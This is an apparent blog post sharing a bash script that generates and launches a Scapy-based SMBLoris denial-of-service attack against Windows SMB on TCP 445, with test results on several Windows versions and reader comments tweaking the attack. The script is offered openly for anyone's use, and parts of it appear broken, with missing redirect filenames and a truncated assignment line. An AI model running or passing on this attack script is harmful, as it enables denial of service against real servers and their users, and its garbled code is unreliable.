SMBLoris on Windows – tests

Last weekend some interesting news were heard from DEFCON 25 about a new SMB Denial of Service attack technically similar to the notorious Slowloris for Apache.

Please refer to the following page for more information about SMBLoris

There was some information available from Sam Bowne Youtube post here

I have transferred his demonstration from his video to a single script to play around with; save how you wish ….

echo "***************************************************************"
echo " MS Windows SMB Remote DOS - need access to TCP 445 "
echo " Thx to Sam Bowne & DEFCON 25 " 
echo "***************************************************************"
echo "[*] Checking if python-scapy module is installed "
python -c "import scapy"
if [ $? -ne 0 ]; then 
echo "[-] Scapy not found please run apt-get install python-scapy"
exit 0
echo "[*] Scapy found "
echo "[*] Setting iptables to stop RST packets "

iptables -F 
iptables -A OUTPUT -p tcp --tcp-flags RST RST -j DROP

echo -e "Remote Windows SMB host IP ? \c"
read ip 
echo -e "How many threads are we gonna use ? [90000 is good] : \c"
read threads

echo 'from scapy.all import *' > 
echo 'import sys' >> 
echo '' >>
echo 'p0 = int(sys.argv[1])' >> 
echo '' >>
echo 'conf.L3socket' >>
echo 'conf.L3socket=L3RawSocket' >>
echo '' >>
echo 'i = IP()' >> 
echo -n 'i.dst = "' >>
echo -n $ip >> 
echo '"' >>
echo 't = TCP()' >> 
echo 't.dport = 445' >> 
echo '' >>
echo -n 'for p in range(p0,p0+' >> 
echo -n $threads >> 
echo '):' >> 
echo ' print p' >> 
echo ' = p' >> 
echo ' t.flags = "S"' >> 
echo '' >>
echo ' r = sr1(i/t)' >> 
echo ' rt = r[TCP]' >>
echo ' t.ack = rt.seq + 1' >> 
echo ' t.seq = rt.ack' >> 
echo ' t.flags= "A"' >> 
echo " sbss = '\x00\x01\xff\xff'" >> 
echo ' send(i/t/sbss)' >> 
ls -la
echo '[*] Running SMB DOS against $ip' 
sleep 2
python 0 & 
python 1000 &
python 2000 &
python 3000 &
python 4000 &
python 5000 &
python 6000 &
python 7000 &
python 8000 &
python 9000 &

The script is pretty self-explanatory, feel free to do whatever you want with it.

Here are my test results and videos for each of the Windows platforms I have ran this script against. I was using Virtual Box in Linux with internal networking. Bear in mind that you need to access TCP 445 on the remote host for this to work, so check your firewalls ;)

Windows Server 2016 – latest patches installed

    • Memory was being slowly eaten, but after while it gets released and starts to grow again .. could have impact if more hosts were sending this attack simultaneously
    • Below you can see the video of the test performed

Windows 2010 x64  – latest patches installed

    • Same behavior observed as with Windows Server 2016; as expected.
    • Below you can see the video of the test performed

Windows 7 SP1 x64 – latest patches installed

    • Here the system came to its knees at one point, given the fact that if I would run off this attack with one more virtual machine the box would have hard times.
    • Below you can see the video of the test performed


Windows Server 2003 R2 x64 – whatever patches were available back then

    • Actually pretty stable during the attack :)
    • Below you can see the video the the test performed

Thats it !

P.S  I have tried against Samba on Linux … no problem so far.. but I would not be so sure .. this has a potential level of abuse .. same goes for NSF/RPC …  lets see what time brings.


About astr0baby

Please run Adblock or similar... we have been told to do so since Carl Sagan wrote the Contact .
Gallery | This entry was posted in Uncategorized. Bookmark the permalink.

5 Responses to SMBLoris on Windows – tests

  1. zimmaro says:

    hi !!!
    ALL ALWAYS thanks for Sharing!!! in the script in line :
    echo -n ‘for p in range(p0,p0+’ >> after the whatch “link” of youtube-video i’ve ADD +700:
    echo -n ‘for p in range(p0,p0+700’ >>
    and in my kali SEEMS to worked fine… is it correct??
    thanks again!

  2. FREE says:

    Nice Blog followd you go on with it :DD

  3. RipperFox says:

    Try this c implementation and see how many seconds your server lasts:

  4. Kurt says:

    Any particular reason for using the “iptables -F” command instead of “iptables -F OUTPUT”?

Leave a Reply

Fill in your details below or click an icon to log in: Logo

You are commenting using your account. Log Out /  Change )

Google+ photo

You are commenting using your Google+ account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )


Connecting to %s

This site uses Akismet to reduce spam. Learn how your comment data is processed.